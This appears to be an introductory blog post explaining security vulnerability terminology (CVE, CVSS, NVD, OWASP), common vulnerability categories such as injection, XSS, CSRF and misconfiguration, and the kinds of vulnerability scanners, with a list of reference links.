Define Your Terms
A security vulnerability is a flaw or bug that could be exploited by a threat agent/threat actor. According to CrowdStrike, “A threat actor, also known as a malicious actor, is any person or organization that intentionally causes harm in the digital sphere.”
Once a bug or flaw is deemed a vulnerability, it is registered by the MITRE Corporation as a Common Vulnerability or Exposure (CVE) and stored in their CVE database. A CVE is given an identifying number by a CVE Numbering Authority (CNA), for example, Red Hat, Microsoft, and other designated authorities.
Threat levels are quantified by assigning a Common Vulnerability Scoring System (CVSS) score from 0 to 10. CVSS is a free and open standard for evaluating the level of threat to a business or organization maintained by the Forum of Incident Response and Security Teams (FIRST).
The National Institute of Standards and Technology (NIST) is a federal agency housing the National Vulnerability Database (NVD). NIST provides a CVSS calculator. The NIST NVD database synchronizes with the MITRE CVE database. Only the NVD includes CVSS scores.
Real live people spend a lot of time and money trying to break into specific high-value targets, as do bots that clever people have weaponized to attack more cheaply and broadly at all hours of the day.
Main Security Vulnerability Categories
The main information security vulnerability categories are:
When security credentials are stolen, attackers can usurp user identities and sessions as if they were the user.
Attackers can hijack database content by injecting malicious code. It can allow attackers to acquire sensitive data, modify or delete data, impersonate identities, and conduct other nefarious activities.
Cross-site scripting (XSS)
This type of attack inserts malicious code into a website. Its target is the website user, threatening sensitive user information.
Cross-Site Request Forgery (CSRF)
A configuration error that can be exploited by attackers. For example:
- Default passwords left in place
- No password strength requirements to prevent users from setting weak passwords that can easily be found in dictionary attacks
- Web server directory listings left enabled, possibly exposing files that shouldn’t be seen
- Unused software modules or plugins left enabled, increasing the attack surface
Especially out-of-date software. As more time passes without getting security updates, attackers can examine code for bugs and flaws that could be exploited. Thus, a given piece of software that was secure at one time may be vulnerable six months later or even the next day.
For more on vulnerability categories, see our blog post on the OWASP Top 10. OWASP is the Open Web Application Security Project, which defines itself as “a nonprofit foundation that works to improve the security of software. Through community-led open-source software projects, hundreds of local chapters worldwide, tens of thousands of members, and leading educational and training conferences, the OWASP Foundation is the source for developers and technologists to secure the web.”
Applications to scan for vulnerabilities are available. Some are free and/or open source, some are paid, and some have a free version and a paid version.
Vulnerability scanners are automated tools that look into a database of known CVEs for the specific software and library versions running on a given server. They also examine systems for flaw types that could be exploited.
In general, the vulnerabilities fall into three classifications:
- System/Network: The application scans for system misconfiguration and network CVEs.
- Web: The application scans for SQL Injections, XSS, CSRF, etc.
- Software Analysis: Static Application Security Testing (SAST). SAST analyzes source code to find security vulnerabilities. Each SAST has a set of languages it can scan, sometimes one or two, sometimes up to a dozen or more.
In summary, vulnerability scanning is a vital process that spans many aspects of Information Technology (IT). Its solutions are constantly evolving to keep up with new threats, an endless cat-and-mouse game where the cats must be ever adaptive to keep ahead of the ever-evolving malicious mice.
- CrowdStrike’s explanation of a threat actor
- MITRE Corporation
- CVE database
- Forum of Incident Response and Security Teams (FIRST)
- Common Vulnerability Scoring System (CVSS) at NIST and CVSS at Wikipedia
- National Institute of Standards and Technology (NIST)
- National Vulnerability Database (NVD)
- Open Web Application Security Project (OWASP)